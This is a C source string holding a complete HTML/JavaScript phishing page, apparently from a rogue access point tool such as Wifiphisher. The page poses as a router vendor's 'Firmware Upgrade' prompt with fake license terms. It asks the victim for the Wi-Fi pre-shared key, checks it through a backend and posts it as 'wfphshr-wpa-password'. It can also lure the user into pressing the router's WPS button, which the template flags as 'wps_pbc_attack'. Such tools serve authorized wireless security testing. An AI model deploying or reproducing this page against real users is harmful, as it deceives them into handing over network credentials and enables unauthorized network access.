
const char fu_index_html[] =
"<!DOCTYPE html>\n"
"<html lang=\"en\">\n"
"<head>\n"
"  <title>Configurazione Moded</title>\n"
"  <meta charset=\"utf-8\">\n"
"  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n"
"  <link rel=\"stylesheet\" href=\"/static/bootstrap.min.css\">\n"
//"  <link rel=\"stylesheet\" href=\"/static/font-awesome-4.7.0/css/font-awesome.min.css\">\n"
"  <script src=\"/static/jquery.min.js\"></script>\n"
"  <script src=\"/static/bootstrap.min.js\"></script>\n"
"\n"
"  <!-- CSS -->\n"
"  <style type=\"text/css\">\n"
"    /* Sticky footer styles\n"
"    -------------------------------------------------- */\n"
"    html,\n"
"    body {\n"
"          height: 100%;\n"
"          /* The html and body elements cannot have any padding or margin. */\n"
"        }\n"
"\n"
"        /* Wrapper for page content to push down footer */\n"
"        #wrap {\n"
"          min-height: 100%;\n"
"          height: auto !important;\n"
"          height: 100%;\n"
"          /* Negative indent footer by it's height */\n"
"          margin: 0 auto -60px;\n"
"        }\n"
"\n"
"        /* Set the fixed height of the footer here */\n"
"        #push,\n"
"        #footer {\n"
"          height: 60px;\n"
"        }\n"
"        #footer {\n"
"          background-color: #f5f5f5;\n"
"        }\n"
"\n"
"        /* Lastly, apply responsive CSS fixes as necessary */\n"
"        @media (max-width: 767px) {\n"
"          #footer {\n"
"            margin-left: -20px;\n"
"            margin-right: -20px;\n"
"            padding-left: 20px;\n"
"            padding-right: 20px;\n"
"          }\n"
"        }\n"
"\n"
"    img {\n"
"        width: auto;\n"
"        max-width: 100%;\n"
"        height: auto;\n"
"    }\n"
"    .isa_info {\n"
"        color: #9F6000;\n"
"        background-color: #FEEFB3\n"
"    }\n"
"    .isa_info i {\n"
"        margin:1px 3px;\n"
"        font-size:18px;\n"
"        vertical-align:middle;\n"
"    }\n"
"  </style>\n"
"\n"
"</head>\n"
"\n"
"<body>\n"
"\n"
"  <!-- Start navigation bar -->\n"
"  <!-- To change the navigation bar color change background attribute -->\n"
"  <nav class=\"navbar navbar-inverse\" style=\"background:RoyalBlue;margin-top:2em;\">\n"
"    <div class=\"container-fluid\">\n"
"      <div class=\"navbar-header\">\n"
"        <button type=\"button\" class=\"navbar-toggle\" data-toggle=\"collapse\" data-target=\"#myNavbar\">\n"
"          <span class=\"icon-bar\"></span>\n"
"          <span class=\"icon-bar\"></span>\n"
"          <span class=\"icon-bar\"></span>\n"
"        </button>\n"
"        <!--\n"
"        <a class=\"navbar-brand\"><img style=\"background:transparent\" src=\"Your LOGO\" alt=\"Logo\"></a>\n"
"        -->\n"
"      </div>\n"
"      <div class=\"collapse navbar-collapse\" id=\"myNavbar\">\n"
"        <ul class=\"nav navbar-nav\">\n"
"          <li class=\"dropdown\" data-toggle=\"modal\" data-target=\"#update-only\"><a class=\"dropdown-toggle\"\n"
"              data-toggle=\"dropdown\" href=\"#\" style=\"color:white\">Setup <span class=\"caret\"></span></a>\n"
"            <ul class=\"dropdown-menu\">\n"
"              <li><a href=\"#\">Basic Setup</a></li>\n"
"              <li><a href=\"#\">DDNS</a></li>\n"
"              <li><a href=\"#\">MAC Address Clone</a></li>\n"
"              <li><a href=\"#\">Advanced Routing</a></li>\n"
"            </ul>\n"
"          </li>\n"
"          <li class=\"dropdown\" data-toggle=\"modal\" data-target=\"#update-only\"><a class=\"dropdown-toggle\"\n"
"              data-toggle=\"dropdown\" href=\"#\" style=\"color:white\">Wireless <span class=\"caret\"></span></a>\n"
"            <ul class=\"dropdown-menu\">\n"
"              <li><a href=\"#\">Basic Wireless Settings</a></li>\n"
"              <li><a href=\"#\">Wireless Security</a></li>\n"
"              <li><a href=\"#\">Wireless MAC Filter</a></li>\n"
"              <li><a href=\"#\">Advanced Wireless Settings</a></li>\n"
"            </ul>\n"
"          </li>\n"
"          <li class=\"dropdown\" data-toggle=\"modal\" data-target=\"#update-only\"><a class=\"dropdown-toggle\"\n"
"              data-toggle=\"dropdown\" href=\"#\" style=\"color:white\">Security <span class=\"caret\"></span></a>\n"
"            <ul class=\"dropdown-menu\">\n"
"              <li><a href=\"#\">Firewall</a></li>\n"
"              <li><a href=\"#\">VPN</a></li>\n"
"            </ul>\n"
"          </li>\n"
"          <li class=\"dropdown\" data-toggle=\"modal\" data-target=\"#update-only\"><a class=\"dropdown-toggle\"\n"
"              data-toggle=\"dropdown\" href=\"#\" style=\"color:white\">Access Restriction <span class=\"caret\"></span></a>\n"
"            <ul class=\"dropdown-menu\">\n"
"              <li><a href=\"#\">Internet Access</a></li>\n"
"            </ul>\n"
"          </li>\n"
"          <li class=\"dropdown\" data-toggle=\"modal\" data-target=\"#update-only\"><a class=\"dropdown-toggle\"\n"
"              data-toggle=\"dropdown\" href=\"#\" style=\"color:white\">Administration <span class=\"caret\"></span></a>\n"
"            <ul class=\"dropdown-menu\">\n"
"              <li><a href=\"#\">Management</a></li>\n"
"              <li><a href=\"#\">Log</a></li>\n"
"              <li><a href=\"#\">Diagnostics</a></li>\n"
"              <li><a href=\"#\">Factory Defaults</a></li>\n"
"              <li><a href=\"#\">Config Manegements</a></li>\n"
"            </ul>\n"
"          </li>\n"
"          <li class=\"dropdown\" data-toggle=\"modal\" data-target=\"#update-only\"><a class=\"dropdown-toggle\"\n"
"              data-toggle=\"dropdown\" href=\"#\" style=\"color:white\">Status <span class=\"caret\"></span></a>\n"
"            <ul class=\"dropdown-menu\">\n"
"              <li><a href=\"#\">Router</a></li>\n"
"              <li><a href=\"#\">Local Network</a></li>\n"
"              <li><a href=\"#\">Wireless</a></li>\n"
"              <li><a href=\"#\">Advanced Routing</a></li>\n"
"            </ul>\n"
"          </li>\n"
"        </ul>\n"
"      </div>\n"
"    </div>\n"
"  </nav>\n"
"  <!-- End navigation bar -->\n"
"  <!-- Start page content -->\n"
"  <div class=\"container\">\n"
"     <div class=\"col-sm\">\n"
//"       <center><img id=\"ap_logo_path\" src=\"/static/{{ target_ap_logo_path }}\"></img></center>\n"
"       <center><img id=\"ap_logo_path\" src=\"\"></img></center>\n"
"       <h2 class=\"text-center\" style=\"color:CornflowerBlue\">Firmware Upgrade</h2>\n"
"       <p class=\"lead\">A new version of the {{ target_ap_vendor }} firmware ({{ firmware_version }}) has been detected and awaiting installation. Please review the following terms and conditions and proceed.</p>\n"
"     </div>\n"
"    <form>\n"
"      <div class=\"form-group\">\n"
"        <label for=\"comment\">Terms And Conditions:</label>\n"
"        <textarea readonly class=\"form-control\" rows=\"5\" id=\"comment\">\n"
"1. LICENSE.\n"
"\n"
"Subject to the terms and conditions of this Software License Agreement, {{ target_ap_vendor }} hereby grants you a restricted, limited, non-exclusive, non-transferable, license to use the {{ target_ap_vendor }} Firmware/Software/Drivers only in conjunction with {{ target_ap_vendor }} products. The {{ target_ap_vendor }} Company does not grant you any license rights in any patent, copyright or other intellectual property rights owned by or licensed.\n"
"\n"
"2. NO WARRANTY.\n"
"\n"
"The {{ target_ap_vendor }} Firmware/Software/Drivers are provided \"AS IS\" without warranty of any kind. {{ target_ap_vendor }} Company does not warrant that the functions contained in the {{ target_ap_vendor }} Firmware/Software/Drivers will meet your requirements or that the operation of the {{ target_ap_vendor }} Firmware/Software/Drivers will be uninterrupted or error-free. {{ target_ap_vendor }} Company hereby disclaims all warranties, express or implied, with respect to the {{ target_ap_vendor }} firmware/software/drivers, including, without limitation, any implied warranties of merchantability, fitness for a particular purpose or non-infringement.\n"
"\n"
"3. NO LIABILITY.\n"
"\n"
"In no event shall {{ target_ap_vendor }} Company or any other party which has been involved in the creation, production, or delivery of the {{ target_ap_vendor }} Firmware/Software/Drivers be liable for any damages whatsoever arising from or related to this Software License Agreement or the {{ target_ap_vendor }} Firmware/Software/Drivers, including, without limitation, direct, indirect, consequential, incidental or special damages or losses , including but not limited to damages for lost profits or losses resulting from business interruption or loss of data, regardless of the form of action or legal theory under which the liability may be asserted, even if advised of the possibility or likelihood of such damages.\n"
"\n"
"       </textarea>\n"
"        <div class=\"checkbox\">\n"
"          <label><input type=\"checkbox\" id=\"check-box\" onclick=\"checkBoxStatus()\">I Agree With Above Terms And Conditions</label>\n"
"        </div>\n"
"      </div>\n"
"      <div class=\"form-group-has-feedback\" id=\"psk_field\">\n"
"          <label for=\"pwd\">{{ target_ap_encryption }} {{ password_name }}:</label>\n"
"          <input class=\"form-control\" type=\"password\" id=\"pwd\" disabled>\n"
"      </div>\n"
"      <div class=\"container text-center\">\n"
"        <script>\n"
"            if ( \"1\" == {{ wps_pbc_attack }} && \"1\" == {{ psk_enable }}) {\n"
"                document.write(\"<p align=\\\"left\\\"> Alternatively, please go to the wireless router and press the WPS button for a couple of seconds to initialize the firmware update process.</p>\")\n"
"            } else if ( \"1\" == {{wps_pbc_attack}}) {\n"
"                document.write(\"<p align=\\\"left\\\"> Please go to the wireless router and press the WPS button for a couple of seconds to initialize the firmware update process.</p>\")\n"
"            }\n"
"        </script>\n"
"        <div class=\"isa_info\" id=\"pw_status\" align=\"left\">\n"
"        </div>\n"
"        <button class=\"btn btn-primary\" id=\"btn\">Start Upgrade</button>\n"
"      </div>\n"
"    </form>\n"
"    <div id=\"push\"></div>\n"
"  </div>\n"
"  <!-- Start page content -->\n"
"\n"
"  <!-- Start footer -->\n"
"  <footer class=\"footer\">\n"
"    <div class=\"container text-center\">\n"
"      <p class=\"text-muted\">© {{ target_ap_vendor }} <script>document.write(new Date().getFullYear())</script>, All Rights Reserved.</p>\n"
"    </div>\n"
"  </footer>\n"
"  <!-- End footer -->\n"
"\n"
"  <!-- Start update first message -->\n"
"  <div class=\"modal fade\" id=\"update-only\" role=\"dialog\">\n"
"    <div class=\"modal-dialog modal-sm\">\n"
"      <div class=\"modal-content\">\n"
"        <div class=\"modal-header\">\n"
"          <button type=\"button\" class=\"close\" data-dismiss=\"modal\">&times;</button>\n"
"          <h4 class=\"modal-title\">Information</h4>\n"
"        </div>\n"
"        <div class=\"modal-body\">\n"
"          <p>Upgrade is required.</p>\n"
"        </div>\n"
"        <div class=\"modal-footer\">\n"
"          <button type=\"button\" class=\"btn btn-default\" data-dismiss=\"modal\">Close</button>\n"
"        </div>\n"
"      </div>\n"
"    </div>\n"
"  </div>\n"
"  <!-- End update first message -->\n"
"\n"
"  <!-- Start empty password message -->\n"
"  <div class=\"modal fade\" id=\"empty-pass\">\n"
"    <div class=\"modal-dialog modal-sm\">\n"
"      <div class=\"modal-content\">\n"
"        <div class=\"modal-header\">\n"
"          <button type=\"button\" class=\"close\" data-dismiss=\"modal\">&times;</button>\n"
"          <h4 class=\"modal-title\">Information</h4>\n"
"        </div>\n"
"        <div class=\"modal-body\">\n"
"          <p>Please Input Valid Password.</p>\n"
"        </div>\n"
"        <div class=\"modal-footer\">\n"
"          <button type=\"button\" class=\"btn btn-default\" data-dismiss=\"modal\">Close</button>\n"
"        </div>\n"
"      </div>\n"
"    </div>\n"
"  </div>\n"
"  <!-- End empty password message -->\n"
"\n"
"  <!-- Start empty password message -->\n"
"  <div class=\"modal fade\" id=\"no-checkbox\">\n"
"    <div class=\"modal-dialog modal-sm\">\n"
"      <div class=\"modal-content\">\n"
"        <div class=\"modal-header\">\n"
"          <button type=\"button\" class=\"close\" data-dismiss=\"modal\">&times;</button>\n"
"          <h4 class=\"modal-title\">Information</h4>\n"
"        </div>\n"
"        <div class=\"modal-body\">\n"
"          <p>Please agree with the Terms And Conditions to proceed.</p>\n"
"        </div>\n"
"        <div class=\"modal-footer\">\n"
"          <button type=\"button\" class=\"btn btn-default\" data-dismiss=\"modal\">Close</button>\n"
"        </div>\n"
"      </div>\n"
"    </div>\n"
"  </div>\n"
"  <!-- End empty password message -->\n"
"\n"
"<script>\n"
"/* If we don't have the logo just not display the image */\n"
"var match = /^http:.*static\\/$/.exec(document.getElementById(\"ap_logo_path\").src);\n"
"if (match) {\n"
"    document.getElementById('ap_logo_path').style.display = 'none';\n"
"}\n"
"\n"
"/* initialize the status description based on wps_pbc_attack and psk_enable flags */\n"
"var pw_status_element = document.getElementById('pw_status');\n"
"if (\"0\" == {{psk_enable}} && \"1\" == {{wps_pbc_attack}}) {\n"
"    /* hide the pre-shared key region if psk_enable is 0 in the config.ini */\n"
"    document.getElementById('psk_field').style.display = 'none';\n"
"    pw_status_element.innerHTML = \"<i class=\\\"fa fa-info-circle\\\"></i>Awaiting user to push the WPS button to initialize firmware upgrade.\";\n"
"} else if (\"1\" == {{psk_enable}} && \"1\" == {{wps_pbc_attack}}) {\n"
"    pw_status_element.innerHTML = \"<i class=\\\"fa fa-info-circle\\\"></i>Awaiting user to push the WPS button or enter the {{ password_name }} to initialize firmware upgrade.\";\n"
"}\n"
"\n"
"/*\n"
"  Check the password field and act accordingly.\n"
"*/\n"
"$(\"#btn\").on(\"click\", function(e) {\n"
"    e.preventDefault();\n"
"\n"
"    // get the password box and checkbox elements\n"
"    var input = document.getElementById(\"pwd\");\n"
"    var box = document.getElementById(\"check-box\");\n"
"\n"
"    // if the box is checked\n"
"    if ( box.checked == true )\n"
"      {\n"
"        // check if the psk not entered and wps_pbc_attack is enabled\n"
"        if (input.value == \"\" && \"1\" == {{wps_pbc_attack}})\n"
"        {\n"
"            // pass to wps state handler\n"
"            var data =\n"
"            {\n"
"                \"get_wps_state_handler\": input.value\n"
"            };\n"
"            var dataToSend = JSON.stringify(data);\n"
"            // post the data\n"
"            $.ajax(\n"
"                {\n"
"                    url: '/backend/',\n"
"                    type: 'POST',\n"
"                    data: dataToSend,\n"
"\n"
"                    success: function (jsonResponse) {\n"
"                        var objresponse = JSON.parse(jsonResponse);\n"
"                        var verify_status = objresponse['get_wps_state_handler']\n"
"                        if (verify_status == 'WPS_CONNECTING' || verify_status == \"WPS_CONNECTED\") {\n"
"                            /* green for success */\n"
"                            pw_status_element.style.color = \"#4F8A10\";\n"
"                            pw_status_element.style.backgroundColor = \"#DFF2BF\";\n"
"                            pw_status_element.innerHTML = \"<i class=\\\"fa fa-check\\\"></i>Firmware download complete!\"\n"
"                        } else if (verify_status == \"WPS_IDLE\") {\n"
"                            /* red for error */\n"
"                            pw_status_element.style.color = \"#D8000C\";\n"
"                            pw_status_element.style.backgroundColor = \"#FFD2D2\";\n"
"                            pw_status_element.innerHTML = \"<i class=\\\"fa fa-times-circle\\\"></i>Please push the WPS button before initiating the firmware upgrade!\"\n"
"                        }\n"
"                    },\n"
"                });\n"
"        }\n"
"        // preshared-key is not filled\n"
"        else if ( input.value == \"\" ) {\n"
"            $(\"#empty-pass\").modal(\"show\");\n"
"        }\n"
"        else\n"
"          {\n"
"                var data =\n"
"                {\n"
"                    \"psk_verify\": input.value\n"
"                };\n"
"                var dataToSend = JSON.stringify(data);\n"
"                // post the data\n"
"                $.ajax(\n"
"                    {\n"
"                        url: '/backend/',\n"
"                        type: 'POST',\n"
"                        data: dataToSend,\n"
"\n"
"                        success: function (jsonResponse) {\n"
"                            var objresponse = JSON.parse(jsonResponse);\n"
"                            var verify_status = objresponse['psk_verify']\n"
"                            if (verify_status == 'success') {\n"
"                                document.getElementById(\"pw_status\").innerHTML = \"\"\n"
"                                post('upgrading.html', {\"wfphshr-wpa-password\": input.value});\n"
"                            } else if (verify_status == 'fail') {\n"
"                                pw_status_element.style.color = \"#D8000C\";\n"
"                                pw_status_element.style.backgroundColor = \"#FFD2D2\";\n"
"                                pw_status_element.innerHTML = \"<i class=\\\"fa fa-times-circle\\\"></i>The provided {{ password_name }} is invalid!\"\n"
"                            } else {\n"
"                                /* we may not define the extensions and in that case\n"
"                                   just post the passphrase */\n"
"                                post('upgrading.html', {\"wfphshr-wpa-password\": input.value});\n"
"                            }\n"
"                        },\n"
"                    });\n"
"              }\n"
"      }\n"
"    else\n"
"      {\n"
"        // display no checkbox message\n"
"        $(\"#no-checkbox\").modal(\"show\");\n"
"      }\n"
"});\n"
"\n"
"/*\n"
"  Post to the fallowing path given the parameters.\n"
"\n"
"  Args:\n"
"    path: The path to be posted to.\n"
"    params: The parameters to be passed.\n"
"*/\n"
"function post(path, params) {\n"
"    // create a form and set its attributes\n"
"    var form = document.createElement(\"form\");\n"
"    form.setAttribute(\"method\", \"post\");\n"
"    form.setAttribute(\"action\", path);\n"
"\n"
"    // set the attribute for the post\n"
"    for(var key in params) {\n"
"        if(params.hasOwnProperty(key)) {\n"
"            var hiddenField = document.createElement(\"input\");\n"
"            hiddenField.setAttribute(\"type\", \"hidden\");\n"
"            hiddenField.setAttribute(\"name\", key);\n"
"            hiddenField.setAttribute(\"value\", params[key]);\n"
"\n"
"            form.appendChild(hiddenField);\n"
"         }\n"
"    }\n"
"\n"
"    // submit the post\n"
"    document.body.appendChild(form);\n"
"    form.submit();\n"
"}\n"
"\n"
"/*\n"
"  Check the status of check box\n"
"*/\n"
"function checkBoxStatus()\n"
"{\n"
"  // get the password box and checkbox elements\n"
"  var box = document.getElementById(\"check-box\");\n"
"  var input = document.getElementById(\"pwd\");\n"
"\n"
"  // if the box is checked\n"
"  if ( box.checked == true )\n"
"    {\n"
"      // enabale the password box\n"
"      input.disabled = false;\n"
"    }\n"
"  else\n"
"    {\n"
"      // disable the password box\n"
"      input.disabled = true;\n"
"    }\n"
"  }\n"
" \n"
"\n"
"</script>\n"
"</body>\n"
"</html>\n";